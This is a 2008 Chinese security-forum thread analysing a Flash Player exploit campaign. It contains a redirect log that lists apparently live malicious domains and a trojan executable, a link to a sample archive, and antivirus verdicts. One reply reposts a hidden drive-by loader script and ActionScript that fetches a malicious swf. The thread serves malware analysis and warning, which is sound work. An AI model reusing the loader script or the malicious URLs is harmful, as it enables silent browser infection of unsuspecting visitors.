最新Flash网马泛滥

秋叶濛濛

来源：卡卡救援区

Log is generated by FreShow.
[wide]http://%73%61%79%38%2E%75%73/s.js
    [frame]http://d.sorryl.biz/xx/am7.htm?888
        [frame]http://d.sorryl.biz/ax14.htm
            [object]http://www.tongji123.org/soc.exe
        [frame]http://d.sorryl.biz/re10.htm
            [object]http://www.tongji123.org/soc.exe
        [frame]http://www.tongji123.org/axfs.htm


（对比查看信息地址http://www.scanw.com/blog/archives/208）
            
            [object]http://www.tongji123.org/1231.swf
                [object]http://www.tongji123.org/i1231.swf
        [frame]http://d.sorryl.biz/axlz.htm
            [object]http://www.tongji123.org/soc.exe
        [frame]http://d.sorryl.biz/re11.htm
            [object]http://www.tongji123.org/soc.exe

1231.swf是正常文件 其中调用恶意构造的i1231.swf，会导致溢出，从而执行任意指令。

1231.swf文件内容调用i1231.swf

i1231.swf文件内容导致溢出



附带样本和恶意swf文件
桌面.rar (23.48 KB, 下载次数: 98)

2008-5-27 16:54 上传

点击文件名下载附件

Dr.Web

Muldrop.Trojan

Avira

Heru/Malware

sanhu35

只会对124以前的版有效
124版早就放出了

palfan

http://www.tongji123.org/

这个域名好像看见过很多次了

PS.swf用什么分析的？

秋叶濛濛

Flash插件是必须的 关键谁没事做更新Flash插件-。-
这么貌似危害要比06024或者迅雷之类大得多

秋叶濛濛

原帖由 palfan 于 2008-5-27 17:02 发表
http://www.tongji123.org/

这个域名好像看见过很多次了

PS.swf用什么分析的？

十六进制编辑器

25029001  1231.swf  97 Byte  CLEAN
25029364  soc.exe  21.81 KB  MALWARE
25029003  i1231.swf  1.5 KB  CLEAN

The file 'soc.exe' has been determined to be 'MALWARE'.
Our analysts named the threat TR/Drop.Agent.jum. The term "TR/" denotes a trojan horse that is able to spy out data, to violate your privacy or carry out unwanted modifications to the system.Detection will be added to our virus definition file (VDF) with one of the next updates. Please note that Avira's proactive heuristic detection module AHeAD detected this threat up front without the latest VDF update as: HEUR/Malware.

tanlimo

可惜，已经打补丁了，无法体会这个漏洞的强大之处了。

这两swf用记事本就能分析了。

palfan

也许再过不久就会出现sliverlight病毒了呢

电影结束了

ranguangning

【【【【转过来】】】】

最近几天拦截到利用Adobe Flash Player SWF文件漏洞的网马，该网马通过网页加载一个正常的FLASH文件，再在那个FLASH文件里调用嵌入恶意构造的FLASH文件，这时会导致溢出，从而可能执行任意指令。以下为调用页内容：
<script>
window.onerror=function(){return true;}
function init(){window.status=”";}window.onload = init;
if(document.cookie.indexOf(”play=”)==-1){
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie=”play=Yes;path=/;expires=”+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf(”msie”)>0)
{
document.write(’<object classid=”clsid:d27cdb6e-ae6d-11cf-96b8-444553540000″ codebase=”http://download.macromedia.com/p ... flash.cab#version=4,0,19,0″ width=”0″ height=”0″ align=”middle”>’);
document.write(’<param name=”allowScriptAccess” value=”sameDomain”/>’);
document.write(’<param name=”movie” value=”http://www.XXX.cn/flash/XX.swf”/>’);
document.write(’<param name=”quality” value=”high”/>’);
document.write(’<param name=”bgcolor” value=”#ffffff”/>’);
document.write(’<embed src=”http://www.XXX.cn/flash/XX.swf” mce_src=”http://www.XXX.cn/flash/XX.swf”/>’);
document.write(’</object>’);
}else
{document.write(”<EMBED src=http://www.XXX.cn/flash/XX.swf width=0 height=0>”);}}
</script>                                                                              

以下为正常的FLASH文件使用的脚本：


// Action script…// [Action in Frame 1]
var flashVersion =/hxversion;
loadMovie(”http://www.XXX.cn/flash/” + flashVersion + “mal_swf.swf”, _root);
stop();

该恶意FLASH部分内容如下：



[ 本帖最后由 ranguangning 于 2008-5-27 18:12 编辑 ]